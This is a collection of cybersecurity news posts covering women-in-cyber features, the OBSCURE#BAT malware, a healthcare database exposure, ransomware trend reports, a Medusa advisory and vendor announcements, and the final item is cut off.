CyberSecurity

Home CyberSecurity

Advancing Gender Equality in 2025 and Beyond

0

International Women’s Day (IWD) 2025 carries the powerful theme: ‘Accelerate Action.’ This theme calls on individuals, communities, and organisations to take decisive steps toward achieving gender equality. Despite ongoing efforts, at the current rate of progress, it will take until 2158, more than five generations, to reach full gender parity, according to the World Economic Forum. Such a timeline is unacceptable. Now, more than ever, we must accelerate action to break down systemic barriers and biases that hinder gender equality in both personal and professional spheres.

The Role of Women in Cybersecurity

The cybersecurity industry is one of the fastest-growing sectors globally, yet it remains deeply underrepresented when it comes to gender diversity. As of 2022, women accounted for only 25% of cybersecurity jobs, with projections suggesting an increase to 30% by 2025. However, leadership positions remain scarce for women, particularly in the UK. The challenge is guaranteeing this growth is meaningful, extending beyond entry-level roles to positions of influence and decision-making.

With Diversity, Equity, and Inclusion (DEI) initiatives under increasing threat due to shifting global political landscapes, it is crucial to keep the conversation about gender equality alive, even when formal policies may be at risk. Industry leaders must explore how to sustain progress and prevent regression in diverse hiring and inclusive workplace cultures.

Step Outside Your Comfort Zone

Liz Harvey, Director of Product Research at Huntress, believes true growth comes from stepping outside one’s comfort zone and embracing diversity in all its forms. She emphasises the importance of rejecting sameness and actively fostering inclusivity by challenging norms and making intolerance unacceptable.

“Build tolerance. Become the other,” Harvey says, reflecting on the experiences that shaped her perspective. From working as an AmeriCorps Construction Crew Lead at Habitat for Humanity, where she defied traditional gender roles, to immersing herself in different cultures while studying abroad, she has continuously sought opportunities to broaden her worldview.

She recalls joining community soccer leagues and summer camps organised by a religion different from her own, gaining first-hand insight into new beliefs and perspectives. Throughout her career, she has often been the only woman in the room, yet she has never let that limit her. Instead, she encourages others to step beyond familiar spaces, embrace discomfort, and contribute to a more inclusive world.

“Reject sameness. Embrace adventuring out of your comfort zone to evolve humanity,” Harvey urges. “Make intolerance unacceptable.” Her message is clear: true progress comes from diversity, curiosity, and the courage to challenge societal norms.

Joy Burkholder Meier, General Counsel and Chief Human Resources Officer at Black Duck, agrees that stepping outside one’s comfort zone is important. She attributes much of her career growth to mentorship, not through formal programs but through organic relationships with leaders who offered guidance and encouragement.

Meier stresses the importance of being prepared for opportunities, embracing challenges, and actively solving problems rather than merely identifying them. Her key advice is to work hard, be a problem-solver, and make others’ jobs easier to stand out and advance in your career.

On diversity, Meier states: “Diverse viewpoints lead to the best results. If we don’t problem-solve with these diverse customer bases in mind, then we will have blind spots. And for me, diversity means a lot of different things – not only people of varying gender, race, or nationality but also different educational backgrounds and experiences. A diverse team is going to win every time.”

Breaking Barriers and Driving Change

Dr. Ksenia Peguero, Director of Software Engineering at Black Duck, underscores the historical significance of International Women’s Day, particularly in Russia and other countries where it’s been observed for over a century. “Having grown up in the Soviet Union, International Women’s Day has always been important for me. Firstly, it was and still is a federal holiday in my home country and in many other countries. It was declared a holiday in Russia by Vladimir Lenin as a day to celebrate gender equality in labour and voting rights more than a hundred years ago. Secondly, although the agenda of the holiday has changed throughout the years, its main focus on women’s rights and the advancement of women in the workplace and in all spheres of life is as important today as it was a hundred years ago,” she explains. 

Despite progress, gender disparities in pay, leadership opportunities, and household responsibilities persist, making the observance of this day more relevant than ever. In the tech industry, initiatives such as Girls Who Code and workplace employee resource groups (ERGs) are actively working to reduce bias and support women’s success. “In the technical field, women and allies have been working hard over the last few years to advance the success of women,” Peguero emphasises.

Aditi Gupta, Senior Manager of Professional Services Consulting at Black Duck, reflects on the slow but steady progress of women in STEM. “When I entered the technology workforce in India over 15 years ago, women made up roughly 12% of the STEM workforce. Growing up in my small Indian town, my exposure to professional women was primarily limited to teachers and bank employees, even though countless women contributed invisibly to the economy through informal labour. As one of the fortunate 8% of women enrolled in engineering programs then, I learned early on to pursue the less travelled path,” she notes. 

Despite these challenges, research consistently shows that companies with diverse leadership financially outperform their peers by 25%. At Black Duck, initiatives like the Women’s Employee Resource Group (ERG) play a crucial role in bridging gender gaps by providing mentorship, sponsorship, and networking opportunities. “Our ERG works to increase the visibility and representation of women in the industry,” Gupta emphasises, reinforcing the importance of continued efforts to foster diversity in technology.

More Female Representation Will Drive Change

Women face higher rates of cybercrime and online harassment, making cybersecurity awareness a vital tool for personal safety but also providing exciting career opportunities and professional growth due to that experience. 

Zoya Schaller, Director of Compliance at Keeper Security, emphasises the critical role of cybersecurity in protecting women from the unique threats they face online. “Women experience higher rates of cybercrime, online harassment, and privacy violations,” she explains. With most modern women having some form of online presence, understanding cybersecurity basics is essential for safeguarding personal information and maintaining control over digital identities. 

Beyond personal security, Schaller highlights the growing career opportunities in cybersecurity, an industry that combines intellectual challenges with excellent compensation and rapid growth potential. “By joining this field, women can both protect their own digital lives and help safeguard others,” she says, noting that diverse perspectives strengthen the industry’s ability to combat cyber threats more effectively.

Increasing female representation in cybersecurity is about more than just filling positions; it’s about transforming the industry with fresh perspectives and problem-solving approaches. “When we expand the talent pool to include more women, we’re not only addressing the huge skills gap in the field, but we’re also bringing in new ways of thinking about and solving security problems,” Schaller points out. 

Women’s ability to connect with people and communicate complex concepts in an accessible way makes a tangible impact, especially in designing security measures that users will actually adopt. “What good is a security solution if users find it so frustrating that they look for workarounds?” she asks. Women in cybersecurity also bring invaluable firsthand experience in tackling issues like online harassment and digital privacy, contributing to more effective solutions. Moreover, female leaders tend to uplift other women in the field through mentorship, fostering a ripple effect that benefits the entire industry. “A more diverse cybersecurity industry is better equipped to protect all of us in our increasingly connected world,” Schaller concludes.

Carla Roncato, VP of Identity at WatchGuard Technologies, also looks at how women’s experiences can open doors to career opportunities while addressing critical global challenges. “Today, approximately 850 million people around the world do not have an official ID or a digitally verifiable identification. This impacts their ability to access digital services, such as opening a bank account or applying for a loan. Women, in particular, are disproportionately affected by this identity gap,” she explains. This issue impacts countless communities, including those displaced by conflict and climate disasters, individuals facing housing insecurity, vulnerable youth without legal guardianship, and survivors of domestic violence seeking critical support.

Roncato stresses the importance of raising awareness around the need for digitally verifiable identification to enhance identity protection, reduce fraud, prevent identity theft, and provide broader access to essential services. She also encourages women to consider careers in technology and security, emphasising the opportunities in Digital Identity. “Digital Identity offers not just professional growth but the chance to create impactful change for women everywhere. There has never been a more important time to join this mission and help drive a more inclusive digitally secure future for all.” 

Shaping the Future 

Catarina Santos, Data Protection Consultant at Data Protection People, emphasises the vital role women play in shaping policies, enforcing regulations, and safeguarding data security. She highlights how gender diversity strengthens digital infrastructure and fosters public trust, making the industry more resilient and effective.

“On International Women’s Day, we acknowledge the critical role women play in the evolving field of data protection. As the digital world grows increasingly complex, their expertise is central to shaping policies, enforcing regulations, and ensuring that personal data is kept safe and secure. Women in data protection are instrumental in tackling the challenges of data security, compliance, and privacy in today’s interconnected environment. Their work helps build trust, protect individuals’ rights, and support the integrity of the digital infrastructure. This day serves as a reminder of the importance of diverse leadership and the ongoing need for excellence and innovation in the field of data protection.”

Teresa Jose, Consultant at Pentest People, reflects on her journey into cybersecurity, expressing excitement about her growth and learning in the field. “I was thrilled to enter the cybersecurity industry when I first joined Pentest People as a graduate consultant. I’m incredibly proud of how much I’ve developed my understanding of security within the extended digital environments of organisational structures,” she shares.

She encourages more women to explore careers in cybersecurity, acknowledging the industry’s gender imbalance, particularly in offensive security roles. “Compared to other fields, cybersecurity has fewer female role models, especially in offensive security. I believe more women should consider entering this space,” she says. For those looking to break into the industry, Jose recommends earning fundamental certifications. “Getting certified is a great way to build a strong foundation in cybersecurity and gain a solid understanding of the cyber environment,” she advises.

Natalia Lewandowska, a Security Consultant at Pentest People, highlights the inspiration that comes with being a woman in cybersecurity. “It’s incredible to see more women breaking barriers in this field, bringing diverse perspectives and strengthening the industry as a whole,” she says. The increasing presence of female professionals, including those at Pentest People, fills her with pride and motivation. “Knowing that we are paving the way for future generations to thrive in tech and security is truly inspiring,” she adds.

The Need for Collective Action

The message for IWD 2025 is clear: gender equality cannot wait until 2158. While massive strides have been made, the risk of regression is real, especially with DEI initiatives under threat. Women in cybersecurity and all industries must continue advocating for inclusivity, challenging biases, and accelerating action toward gender equality.

The cybersecurity industry is a prime example of how diverse teams produce better outcomes, bridge skill gaps, and enhance problem-solving. The time for action is now.

The post Advancing Gender Equality in 2025 and Beyond appeared first on IT Security Guru.

New OBSCURE#BAT Malware Targets Users with Fake Captchas

0

OBSCURE#BAT malware campaign exploits social engineering & fake software downloads to evade detection, steal data and persist on systems. Learn how to stay safe.

Cybersecurity researchers at Securonix Threat Labs have spotted a new malware campaign called OBSCURE#BAT. This campaign uses social engineering tactics and fake software downloads to trick users into executing malicious code, enabling attackers to infect systems and avoid detection.

The attack begins with a user executing a malicious batch file, which is often disguised as legitimate security features or malicious software downloads. Once executed, the malware establishes itself by creating scheduled tasks and modifying the Windows Registry to operate even after the system reboots.

The malware then uses a user-mode rootkit to hide its presence on the system, making it difficult for users and security tools to detect. The rootkit can hide files, registry entries, and running processes, allowing the malware to embed further into legitimate system processes and services.

Fake Captchas and Malicious Software Downloads

As seen in recent similar campaigns, hackers have been leveraging typosquatting and social engineering tactics to present fake products as legitimate within their supply chains. This includes:

Masquerading Software: Attackers also disguise their malicious files as trustworthy applications, such as Tor Browser, SIP (VoIP) software or Adobe products, increasing the chances that users will execute them.

Fake Captchas: Users may encounter a fake captcha, especially the Cloudflare captcha feature, that tricks them into executing malicious code. These captchas often originate from typosquatted domains, resembling legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard.

Fake captcha used in the attack (Screenshot Securonix)

Evasion Techniques

The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques. These include:

API Hooking: By using user-mode API hooking, the malware can hide files, registry entries, and running processes. This means that common tools like Windows Task Manager and command-line commands cannot see certain files or processes, particularly those that fit a specific naming scheme (e.g., those starting with “$nya-“).

Registry Manipulation: It registers a fake driver (ACPIx86.sys) in the registry to ensure further persistence. This driver is linked to a Windows service, allowing it to execute malicious code without raising suspicion.

Stealthy Logging: The malware monitors user interactions, such as clipboard activity, and regularly writes this data to encrypted files, further complicating detection and analysis.

Countries Targeted in the OBSCURE#BAT Attack

According to Securonix’s detailed technical report, shared with Hackread.com before its official release on Thursday, the malware appears to be financially motivated or aimed at espionage, targeting users primarily in the following countries:

  • Canada
  • Germany
  • United States
  • United Kingdom

How to Protect Yourself from the OBSCURE#BAT Attack

While common sense is a must when downloading software or clicking on unknown links, users and organizations should also follow these key security measures to protect their systems from OBSCURE#BAT and similar threats:

  • Clean downloads: Only download software from legitimate websites, and be wary of fake captchas and other social engineering tactics.
  • Use endpoint logging: For organizations, deploy endpoint logging tools, such as Sysmon and PowerShell logging, to enhance detection and response capabilities.
  • Monitor for suspicious activity: Regularly monitor systems for suspicious activity, such as unusual network connections or process behaviour.
  • Use threat detection tools: Consider using threat detection tools, such as behavioural analysis and machine learning-based systems, to detect and respond to threats like OBSCURE#BAT.


MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team

0

Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024’s Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee’s answers are written in their own words.

In 2025, the awards were sponsored by BT, KnowBe4, Mimecast, Varonis, Bridewell, Certes, Pentest Tools and AI Dionic. Community partners included WiCyS UK & Ireland Affiliate, Women in Tech and Cybersecurity Hub (WiTCH), CyBlack and Inclusive InCyber (LT Harper). 

What does your job role entail?

As Chief of Staff for Microsoft Red Team, I drive the strategy behind how we innovate and evolve red teaming—transforming it from purely technical operations into a strategic security pillar that directly shapes Microsoft’s overall security direction. My role is to define what modern red teaming looks like—not just for Microsoft, but for the industry—as this space rapidly evolves.
Microsoft is pioneering and reimagining how red teams operate in this new era, ensuring that every finding leads to measurable, lasting fixes. With the rise of AI and the Security Graph, we are shifting from product-based technical assessments to precision-driven security, uncovering micro-level vulnerabilities that could have massive impact. I also lead the vision for extending red teaming beyond human limitations, not only within Microsoft but across our customer ecosystem, helping to shape the future of collective defense. This includes driving strategies to accelerate remediation and push toward a self-healing security model—where threats are dynamically identified, understood, and resolved at scale.

How did you get into the cybersecurity industry?

I never set out to work in cybersecurity—I stumbled into it by accident. But looking back, I realize I’d been preparing for it all along. After leaving my small town in Bulgaria with just $50 and a dream for something bigger, I spent years relentlessly building my tech skills, working nights in restaurants and weekends for free on small tech projects just to prove myself. I was exhausted, broke, and doubted myself constantly. There were so many moments I almost gave up. But I didn’t.
And then, one day, cybersecurity found me. An unexpected opportunity appeared, and even though I felt unqualified and terrified, I took the leap. That leap changed everything.
Cybersecurity became the perfect place for my grit and curiosity to collide—a field where I could protect people, solve complex problems, and make a real impact. Today, I lead strategy for the Microsoft Red Team, helping shape the future of red teaming not just for Microsoft, but for the entire industry.
If my story proves anything, it’s this: you don’t have to see the whole path. You just have to keep going. Keep building. Keep believing. Because sometimes the thing you never planned for becomes the thing you were born to do.

What is one of the biggest challenges you have faced as a woman in the tech/cyber industry and how did you overcome it?

One of the biggest challenges I faced as a woman in cybersecurity was overcoming deep imposter syndrome—believing I didn’t belong in the room. Coming from a small town in Bulgaria with no role models in tech, I carried years of conditioning that told me success in this field wasn’t meant for people like me. Early in my career, I often felt like I had to blend in—dressing, speaking, and acting like the men around me just to be taken seriously.
What helped me overcome it was realizing that my unique story, my perspective, and my authenticity are exactly what make me strong. I found inspiration through the few women ahead of me who owned their space unapologetically, and they helped me see what was possible. Now, I make it my mission to be that example for others—showing women that we don’t have to change who we are to succeed in cybersecurity. We belong here exactly as we are.

What are you doing to support other women, and/or to increase diversity, in the tech/cyber industry?

I’m deeply committed to helping women and underrepresented groups break into cybersecurity and thrive. Over the years, I have served—and continue to serve—on various leadership boards and advisory groups to help shape the future of the industry and drive meaningful community impact. This includes organizations like OWASP Seattle, the EC-Council Certified Ethical Hacker (CEH) Advisory Board, Women in Cybersecurity (WiCyS), and ISACA Puget Sound.
As Co-Founder of Women in Tech Global and a leader in Microsoft Women in Security, I’ve helped build global communities that give women access to career opportunities, speaking platforms, and technical growth.
I also actively mentor young women, guiding them through career transitions, helping them overcome self-doubt, and supporting them as they step into leadership roles they may not have thought possible.
Beyond mentorship, I’m passionate about modernizing cybersecurity education. Through projects like The Hacking Games, I’m helping inspire the next generation of diverse talent by reimagining how we teach ethical hacking to Gen Z.
For me, this work is personal. I know how hard it is to build a path where none exists. That’s why I’m committed to being the example I wish I’d had—and ensuring no woman feels like she has to do it alone.

Who has inspired you in your life/career? 

I’ve been most inspired by the women who dared to take up space in rooms where they were never expected to belong—and did it unapologetically. Seeing strong women lead in cybersecurity with both confidence and authenticity showed me that we don’t have to trade our uniqueness to succeed in this industry. Their example helped me realize that my story, my background, and even my struggles are my power.
But beyond individual people, I’m inspired by the millions of women who haven’t yet been told they belong here. I think of the little girls staring out of windows in small towns, just like I once did, wondering if there’s more to life than what’s been handed to them. They inspire me to keep going, keep building, and keep showing up—because if I can be proof for even one of them that a different future is possible, then every challenge I’ve faced was worth it.
We need more examples to emulate—more women leading, succeeding, and owning their space—so others can see themselves in us. That’s why what we’re doing here is so important. Visibility creates possibility. And together, we’re redefining what’s possible for the next generation.

The post MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team appeared first on IT Security Guru.

HealthTech Database Exposed 108GB Medical and Employment Records

0

A misconfigured database exposed 108.8 GB of sensitive data, including information on over 86,000 healthcare workers affiliated with ESHYFT, a New Jersey-based HealthTech company operating across 29 states. ESHYFT also provides a mobile platform that connects healthcare facilities with qualified nursing professionals.

The exposed database was not password-protected or encrypted and contained a treasure trove of personally identifiable information (PII) including SSNs, scans of identification documents, salary details, work history, and more.

The database was discovered by cybersecurity researcher Jeremiah Fowler who shared their report with Hackread.com revealing that the exposed data included profile images, facial images, professional certificates, work assignment agreements, CVs, and resumes.

Additionally, one spreadsheet document contained over 800,000 entries detailing nurses’ internal IDs, facility names, time and date of shifts, hours worked, and more. What’s worse, medical documents, including medical reports containing information on diagnoses, prescriptions, or treatments, were also exposed.

The exposure of such sensitive data could potentially fall under HIPAA regulations. It can also expose vulnerable users to online and physical risks, including identity theft, employment fraud, financial fraud, and targeted phishing campaigns.

The good news is that Fowler immediately notified ESHYFT. The bad news is that it took the company over a month after being alerted to restrict public access to the database. However, according to Fowler, the exposed database was not owned or directly managed by ESHYFT.

It remains unclear whether a third-party contractor was responsible for its management. Additionally, the duration of the exposure and whether unauthorized parties accessed the data are unknown.

Nevertheless, cybercriminals could use the exposed data to commit crimes in the victims’ names or deceive them into revealing additional personal or financial information. Therefore, HealthTech must implement proper cybersecurity measures including:

  • Implement mandatory encryption protocols for sensitive data.
  • Use multi-factor authentication to prevent unauthorized access.
  • Conduct regular security audits to identify potential vulnerabilities.
  • Segregate sensitive data and assign expiration dates for data that is no longer in use.
  • Have a data breach response plan in place and a dedicated communication channel for reporting potential security incidents.
  • Provide timely responsible disclosure notices to affected individuals and educate them on how to recognize phishing attempts.


WatchGuard unveils FireCloud Internet Access

0

WatchGuard® Technologies, a provider of unified cybersecurity, has announced the launch of FireCloud Internet Access, the first in what it’s describing as “a new family of hybrid secure access service edge (SASE) products”. The company said that FireCloud “uniquely meets the needs of hybrid organisations and WatchGuard’s partners by delivering consistency across Fireboxes and FireCloud with nearly identical configurations and no learning curve.”

Managing real-world cybersecurity means managing hybrid networks that combine traditional on-premises and Cloud/firewall-as-a-service (FWaaS) environments. Many vendors providing SASE solutions overlook the importance of integrated on-premises environments, which diminishes the value of deploying a SASE solution. When a SASE solution does not take these environments into account, they end up creating isolated systems that are managed separately, leading to unnecessary complexity and overhead.

FireCloud Internet Access, WatchGuard said, is the “right answer” for hybrid environments because it integrates with WatchGuard Cloud and shares unified policy management with Firebox, combining firewall-as-a-service (FWaaS) and secure web gateway (SWG) to deliver robust protection without complexity. Furthermore, WatchGuard enables managed service providers (MSPs) to deliver a valuable SASE solution to their clients with an adoption model that fits their hybrid environments. This solution is part of the WatchGuard Unified Security Platform® architecture, which includes Identity, Network, and Endpoint security components, unified management in the WatchGuard Cloud, and a common installation framework for WatchGuard endpoints.

“FireCloud Internet Access provides real security for real-world challenges that today’s businesses face. As remote and distributed work environments evolve and companies transition to the Cloud, the range of threat surfaces and location of endpoints that need protection has expanded,” said Andrew Young, chief product officer at WatchGuard. “Existing solutions don’t allow security teams to seamlessly manage their network security in concert with their SASE deployments, creating security gaps and management complexities. To overcome these limitations, we have developed a new hybrid SASE approach which begins with FireCloud Internet Access.”

 

The FireCloud Internet Access Difference: In addition to being uniquely designed for hybrid Cloud/on-premises environments, FireCloud Internet Access also promises ease of deployment, flexible and scalable licensing and pricing, and integration into WatchGuard’s threat detection and response platform.

  • Designed for Hybrid – WatchGuard’s SASE architecture is one of the few solutions that is designed to deliver value and benefits to a hybrid environment. For lean IT teams or MSPs, this approach means easier management, consistent security controls, and lower costs over other SASE offerings.
  • Ease of Deployment – Administrators can configure and enforce security policies from a single interface, which simplifies management by using consistent policy structures and terminology. Security settings are automatically deployed to all WatchGuard-hosted points of presence (PoPs) worldwide, ensuring consistent policy enforcement no matter where the user is located. FireCloud clients are delivered from the WatchGuard Cloud, making them easy to deploy and manage.
  • Flexible and Scalable – The flexible pricing available with WatchGuard’s FlexPay helps build and grow managed security services provider (MSSP) business. As a firewall-as-a-service, the number of users doesn’t impact performance, and more licenses can be easily added with customer growth.

WatchGuard is committed to delivering a complete SASE solution to meet partners’ and their clients’ needs. Over time, WatchGuard’s FireCloud family of solutions covering private access, SD-WAN, ZTNA, and CASB will be built out and deployed, and along the way, FireCloud customers will also benefit from soon-to-be-released integrations with ThreatSync+ software as a service (SaaS) delivering overwatch threat detection and response, and the client will be integrated with the soon-to-be-released WatchGuard Universal Agent that simplifies device management. As always, WatchGuard said it will work closely with partners to determine the specific SASE needs of their clients.

“SASE is the future of secure connectivity, merging network and security functions into a Cloud-native service. With FireCloud Internet Access and its overall approach to hybrid SASE architecture, WatchGuard’s focus on delivering powerful cybersecurity solutions specially designed for MSPs is on full display,” said Kevin Willette, president of Verus. “This is an affordable and effective solution to protect our clients’ networks and users while still using the same enterprise security found in our Firebox, which makes my business more efficient and improves our bottom line.”

This news follows WatchGuard’s recent acquisition of ActZero, a leading provider of Managed Detection and Response (MDR) services, to accelerate MDR growth for MSP partners and extend their sales reach. WatchGuard, which received recognition from IT Awards, ChannelVision, Fortress Cybersecurity, InfoSec Awards, and TMCnet for its security solutions in 2024, continues to lead the industry in security innovation to offer MSPs more scalable, ready-to-sell solutions that drive revenue.

 

The post WatchGuard unveils FireCloud Internet Access appeared first on IT Security Guru.

126% Surge in Attacks in February 2025

0

February 2025 saw a record 126% surge in ransomware attacks, with Cl0p leading the charge. Hackers exploited file transfer flaws, infostealers, and AI-driven tactics, reveals Bitdefender’s latest Threat Debrief report.

Cybersecurity just reached a new milestone; and not in a good way. According to Bitdefender’s latest Threat Debrief report, February 2025 was the worst month in history for ransomware attacks, with a 126% increase in claimed victims compared to the same period last year.

This surprising jump saw the number of victims soar from 425 in February 2024 to a staggering 962 in February 2025. The massive surge in ransomware attacks occurred despite the United States-led alliance of 40 countries, announced in November 2023, aimed at dismantling ransomware gangs and their infrastructure. The initiative focused on disrupting payments, taking down infrastructure, and enhancing intelligence sharing.

Clop (Cl0p) Ransomware at Its Peak

According to Bitdefender’s report shared with Hackread.com ahead of publishing on Thursday, Cl0p ransomware group Clop was responsible for more than a third of the attacks, claiming 335 victims in just one month. This makes a 300% increase from the previous month.

So, what’s behind this sudden rise in attacks? Cybersecurity experts point to a new trend that’s not so new: attackers are increasingly targeting vulnerabilities in edge network devices, such as file transfer systems and remote access tools.

Instead of focusing on specific industries, these opportunistic hackers are scanning the internet for easily exploitable flaws and launching automated attacks. For example, the Cl0p ransomware gang is notorious for exploiting vulnerabilities in MOVEit, a managed file transfer (MFT) software, with the highest frequency in 2023. The group stole so much data through MOVEit vulnerabilities that it launched a clearnet website to leak stolen information from victims worldwide.

In December 2024, Cl0p also announced exploiting security vulnerabilities in Cleo’s managed file transfer software, specifically targeting Cleo Harmony, VLTrader, and LexiCom products. Bitdefender’s Threat Debrief report also spotted Cl0p’s exploitation of Cleo vulnerabilities, especially CVE-2024-50623 and CVE-2024-55956 both rated 9.8 out of 10 in severity.

Both flaws allow attackers to execute commands remotely on compromised systems and were disclosed late last year. Despite patches being available, many organizations failed to update their systems in time, leaving them wide open to exploitation leading to the surge in victims seen in February 2025.

The illustration highlights the rapid pace at which ransomware gangs exploit vulnerabilities and shift to new targets. (Credit: Ditdefender)

Other Notable Developments in the Ransomware World

Beyond the record-breaking numbers, Bitdefender researchers noticed several other noteworthy trends in February 2025 including:

FunkSec’s New Infostealer

FunkSec, a growing ransomware group, released Wolfer, a tool designed to extract sensitive information from infected machines. It communicates with a Telegram bot to gather system details, Wi-Fi passwords, and more.

A ransomware gang using infostealers is bad news, especially as researchers recently found that cybercriminals are successfully breaching U.S. national security with infostealers as cheap as $10. Even high-security institutions like the military and the FBI have had their systems compromised, with access being sold on the dark web.

Black Basta Gets Analyzed by AI

On February 11, 2025, the notorious Black Basta ransomware gang had its internal chats leaked. These chats contained over 200,000 Russian-language messages. Hudson Rock’s researchers created a chatbot called BlackBastaGPT to sift through the chat logs.

Insights revealed details about their profits, use of deepfake technology, and internal conflicts. The group’s leader emphasized avoiding detection by using built-in system tools, a tactic known as “living off the land.”

Ghost Ransomware Under Scrutiny

A joint advisory from CISA highlighted Ghost (also known as Cring), a China-based ransomware operation exploiting older but still unpatched vulnerabilities. Recommendations include patching affected software, segmenting networks, and backing up data regularly.

Akira’s Webcam Hack

The Akira ransomware gang found a creative way to bypass security by hijacking a victim’s webcam. Since the device ran Linux and wasn’t monitored closely, it became the perfect launchpad for encrypting files across the network undetected.

Stephen Kowski, Field CTO at Pleasanton, Calif.-based SlashNext Email Security+ commented on the latest development emphasizing the need to fix vulnerabilities by improving threat detection and response capabilities.

“We expect ransomware attacks to continue increasing this year, especially targeting healthcare, manufacturing, critical infrastructure, and supply chains. High-profile incidents in 2024 highlight the ongoing vulnerabilities,” warned Stephen. “To combat this, organizations need to focus on strengthening email security, implementing zero-trust architectures, and improving threat detection and response capabilities.”

Top 10 Companies Most Targeted by Ransomware Gangs

The United States, Canada, the UK, Germany, and other developed nations remain the biggest targets of ransomware groups. These countries are highly vulnerable due to their reliance on connected edge devices, cloud infrastructure, and critical business data.

In total, these are the top 10 companies most targeted by ransomware gangs:

  1. USA
  2. Canada
  3. The UK
  4. Germany
  5. France
  6. Australia
  7. Brazil
  8. Mexico
  9. Italy
  10. Sweden

For those looking to understand the full scope of modern ransomware operations and how to fight back, Bitdefender has published a comprehensive whitepaper detailing current attack methods and defence strategies. You can access it here.


KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk

0

KnowBe4, cybersecurity platform that comprehensively addresses human risk management, has released new research indicating that while 86% of employees believe they can confidently identify phishing emails, nearly half have fallen for scams. The study, which surveyed professionals across the UK, USA, Germany, France, Netherlands, and South Africa, reveals a growing gap between confidence and competence in identifying cyber threats.

Notably, South Africa leads with both the highest confidence levels and the highest scam victimization rate, suggesting that misplaced confidence can create a false sense of security, leaving employees more susceptible to advanced cyber threats. Beyond training, the report highlights the importance of fostering a transparent security culture. While 56% of employees feel “very comfortable” reporting security concerns, 1 in 10 still hesitate due to fear or uncertainty.

Key findings from the survey included:

●      86% of employees believe they can confidently identify phishing emails.

●      24% have fallen for phishing attacks.

●      12% have been tricked by deepfake scams.

●      68% of South African employees reported falling for scams—the highest victimisation rate.

“Overconfidence fosters a dangerous blind spot—employees assume they are scam-savvy when, in reality, cybercriminals can exploit more than 30 susceptibility factors, including psychological and cognitive biases, situational awareness gaps, behavioural tendencies, and even demographic traits,” said Anna Collard, SVP content strategy and evangelist, KnowBe4. “With phishing, AI-driven social engineering, and deepfake scams evolving rapidly, organisations must counteract misplaced confidence with hands-on, scenario-based training. True cyber resilience comes not from assumed knowledge but from continuous education, real-world testing, and an adaptive security mindset.”

The survey findings emphasize the critical need for personalised, relevant, and adaptive training that caters to employees’ individual needs while considering regional influences and evolving cyber tactics. Organisations that prioritise this approach will not only reduce risk but also cultivate a genuine security-first culture. In the battle against digital deception, the most dangerous mistake employees can make is assuming they are immune.

The survey findings, “Security Approaches Around the Globe: The Confidence Gap,” is available for download here.

The post KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk appeared first on IT Security Guru.

FBI and CISA Urge Enabling 2FA to Counter Medusa Ransomware

0

FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and why paying ransoms is discouraged. 

A joint advisory by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) has revealed a particularly aggressive digital threat- a criminal operation, known as the Medusa ransomware gang.

According to the advisory (#StopRansomware: Medusa Ransomware), Medusa, a ransomware-as-a-service (RaaS) group first identified in June 2021, has become a serious threat to critical infrastructure sectors in the United States.

Authorities have identified a pattern of attacks affecting organizations across diverse sectors, including healthcare, education, law firms, insurance providers, technology companies, and manufacturers. Their victims include Bell Ambulance in Wisconsin, CPI Books, Customer Management Systems, and Heartland Health Center. The sheer number of victims, surpassing 300 as of December 2024, highlights the scope of this threat. 

The actors utilize different methods to infiltrate systems, including deceptive communications (phishing) and exploiting unpatched software vulnerabilities (e.g. ScreenConnect authentication bypass CVE-2024-1709). Once inside a network, they use legitimate system administration tools to move undetected. 

They employ a unique approach to extortion, which involves encrypting victims’ data and rendering it inaccessible, along with threatening to expose sensitive information if their demands are not met. This tactic creates immense pressure on targeted organizations, forcing them to consider paying the ransom to prevent public disclosure of their data.  

“Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa,” the advisory (PDF) warns.

Medusa uses advanced techniques to conceal its activities, such as remote access software to control compromised systems and using encrypted scripts and tools to create hidden connections to its command servers, thereby evading security software detection. 

A particularly concerning aspect of this operation is the aggressive nature of their extortion tactics. Victims are given a very short window of time to pay the ransom, often just two days. They are pressured through direct communication, and if they fail to comply, their stolen data is made available on darknet websites. There are even reports that paying the initial ransom might not guarantee the end of the ordeal, as further demands may follow.

In response to this growing threat, federal agencies have emphasized the need for ensuring regular software updates, implementing reliable access controls, and using multi-factor authentication. They also advise monitoring network activity for suspicious behaviour, limiting the use of remote desktop protocols, and segmenting networks to contain any potential breaches. 

Moreover, users are urged to enable two-factor authentication (2FA) for webmail and VPNs as social engineering is a significant factor in these attacks. All organizations affected by the Medusa ransomware are requested to report the incidents to law enforcement and to avoid paying any ransom demands.


Check Point Software Celebrates Continued Partner Success at UK Partner Awards

0

Check Point® Software has announced the winners of its UK Partner Awards. The annual awards ceremony, which took place at One Moorgate Place on March 6th, 2025, celebrated the input of Check Point’s affiliate companies and the growing partner community across the UK.

The 2025 Check Point UK Partner Awards recognised the continued dedication of trusted UK partners over the past year and their commitment to helping organisations become more secure. A gala dinner was held to celebrate these successes, followed by the awards presentations. Mark Weir, Regional Director UK&I at Check Point Software, and Martin Rutterford, Channel Director for the UK & Ireland at Check Point Software, opened the event by reflecting on the company’s achievements over the past year. Charlotte WIlson, Head of Enterprise Sales at Check Point Software, joined esteemed comedian Tom Allen to present the awards. 

